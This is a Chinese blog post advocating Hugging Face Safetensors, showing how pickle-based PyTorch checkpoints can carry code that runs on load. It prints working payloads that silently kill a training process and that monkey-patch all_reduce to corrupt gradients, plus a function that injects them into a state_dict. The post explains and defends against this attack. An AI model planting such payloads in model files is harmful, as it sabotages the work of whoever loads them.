作者: 李升桂,原文链接:
https://franklee.xyz/blogs/2024-10-19-safetensor
很久很久以前,当我阅读大量 Hugging Face 文档时,一个非常简单的问题浮现在我的脑海中——Hugging Face 的 Safetensors 是做什么用的?“Safetensors”这个词在 Hugging Face 的文档中多次出现,但人们很少讨论它的目的。
最近发生了一起安全事件,影响了某个团队的模型训练进度,这促使我重新思考这个问题,并撰写这篇博客。需要注意的是,这篇博客并不是对该事件的讨论,而是从技术角度倡导使用 Safetensors 来保护模型的安全性,因为在 AI 时代,模型是最重要的资产。
Hugging Face Safetensors 文档 https://hf.co/docs/safetensors/en/index
当前的模型存储方式有什么问题?
当我们训练模型时,通常会将模型的权重保存到文件中,以便在检查点保存和稍后加载。最流行的格式是 PyTorch 的状态字典,它是一个 Python 字典对象,将每一层映射到其参数 tensor。我猜大多数人对以下代码片段都很熟悉:
# 保存模型权重
state_dict = model.state_dict()
torch.save(state_dict, "model.pt")
# 加载模型权重
state_dict = torch.load("model.pt")
model.load_state_dict(state_dict)
然而,这种方法使用 pickle
来序列化和反序列化整个状态字典对象,引发了安全性问题。原因在于 pickle
并不安全,可能会加载具有与反序列化程序相同权限的任意代码。攻击者可以通过模型权重注入任意代码,造成严重的安全问题。一种攻击模型权重的方法是修改其 __reduce__
方法来执行任意代码。
class Obj:
def __reduce__(self):
return (exec, ("print('hello')",))
如果你将此对象序列化并保存到文件中,那么加载对象时代码就会执行。也就是说,当你加载对象时,你会看到打印出的 "hello"。
有了这个概念,我们基本上可以操控程序的许多部分,包括导入的库和本地变量。我提供了两个典型场景,展示如何中断训练过程以及篡改模型权重的算术正确性。你也可以在我的
作者的博客笔记 https://github.com/FrankLeeeee/Blog-Notes/tree/main/2024-10-19-safetensor
场景 1:自动终止训练过程
如上例中的 "hello" 一样,恶意代码可以编写为一个代码字符串。同样,我们可以准备如下代码字符串,创建一个新线程,该线程在 5 秒后终止父进程。此线程在后台运行,因此用户不会注意到任何异常,而 os.kill
不返回错误日志,这使得检测恶意代码变得更加困难。
AUTO_SHUTDOWN = """
import os
import threading
from functools import partial
# 获取进程 ID
pid = os.getpid()
def inject_code(pid: int):
import time
import os
time.sleep(5)
os.kill(pid, 9)
wrapped_fn = partial(inject_code, pid)
injection_thread = threading.Thread(target=wrapped_fn)
injection_thread.start()
"""
接下来,我们需要将此代码注入到状态字典对象中。结果是,当我们从磁盘加载模型权重时,代码会执行,训练过程会被中断。
def inject_malicious_code(obj, code_str):
# 绑定一个 reduce 函数到权重上
def reduce(self):
return (exec, (code_str, ))
# 将 reduce 函数绑定到权重的 __reduce__ 方法上
bound_reduce = reduce.__get__(obj, obj.__class__)
setattr(obj, "__reduce__", bound_reduce)
return obj
state_dict = inject_malicious_code(state_dict, AUTO_SHUTDOWN)
场景 2:在集合通信中引入错误
类似地,如果我们想修改集合通信操作的行为,可以在计算过程中引入错误,使得分布式训练中的梯度永远不正确。我们可以准备如下代码字符串,劫持 all_reduce
函数。这个代码字符串对 torch.distributed
模块中的 all_reduce
API 进行猴子补丁,并对 tensor 执行加 1 操作。结果是 all-reduce 的结果会比预期结果大。
HIJACK_ALL_REDUCE = """
import torch.distributed as dist
dist._origin_all_reduce = dist.all_reduce
def hijacked_all_reduce(tensor, *args, **kwargs):
import torch.distributed as dist
tensor = tensor.add_(1)
return dist._origin_all_reduce(tensor, *args, **kwargs)
setattr(dist, "all_reduce", hijacked_all_reduce)
"""
例如,如果你有两个进程,每个进程持有 tensor [0, 1, 2, 3]
,all-reduce 操作会将各个进程的 tensor 相加,结果是 [0, 2, 4, 6]
。然而,如果攻击者注入了恶意代码,结果将变为 [2, 4, 6, 8]
。
Safetensors 如何解决问题?
首先,Safetensors 不使用 pickle
来序列化和反序列化状态字典对象。相反,它使用自定义的序列化方法来存储模型权重。这样,攻击者无法将任意代码注入到模型权重中。更为惊人的是,Safetensors 在存储和保存模型权重时仍然保持了快速零拷贝的特性。简单来说,Hugging Face 的 Safetensors 确保你的模型权重文件只包含参数数据,而不包含其他任何内容。
我还展示了一些使用 Safetensors 的示例,帮助消除安全隐患,详见我的博客笔记。对于每个演示恶意场景的例子,你只需在命令中添加 --use-safetensor
标志即可看到差异。
此外,如果你仍希望使用 torch.load
,可以指定参数 weights_only
,这样 PyTorch 将限制 unpickler 只解包元数据和 tensor。
参考资料
本文由 Hugging Face 中文社区内容共建项目提供,稿件由社区成员投稿,经授权发布于 Hugging Face 公众号。
原作者:李升桂,请访问博客原文了解更多:
https://hf.link/tougao